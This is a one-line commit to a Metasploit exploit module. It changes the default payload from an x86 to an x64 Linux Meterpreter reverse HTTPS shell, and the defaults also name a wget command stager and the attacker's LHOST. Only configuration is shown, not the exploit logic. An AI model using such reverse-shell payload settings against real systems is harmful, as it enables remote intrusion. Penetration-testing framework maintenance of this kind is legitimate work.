Use payload common case instead of general case

Both x86 and x64 work on x64, but we really expect x64, and there's no
migration to move us from x86 to x64.
bug/bundler_fix
William Vu 2017-05-11 15:42:15 -05:00
parent 0627b10996
commit 2ae943d981
1 changed files with 1 additions and 1 deletions

View File

@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter_reverse_https',
'PAYLOAD' => 'linux/x64/meterpreter_reverse_https',
'LHOST' => Rex::Socket.source_address,
'CMDSTAGER::FLAVOR' => 'wget'
},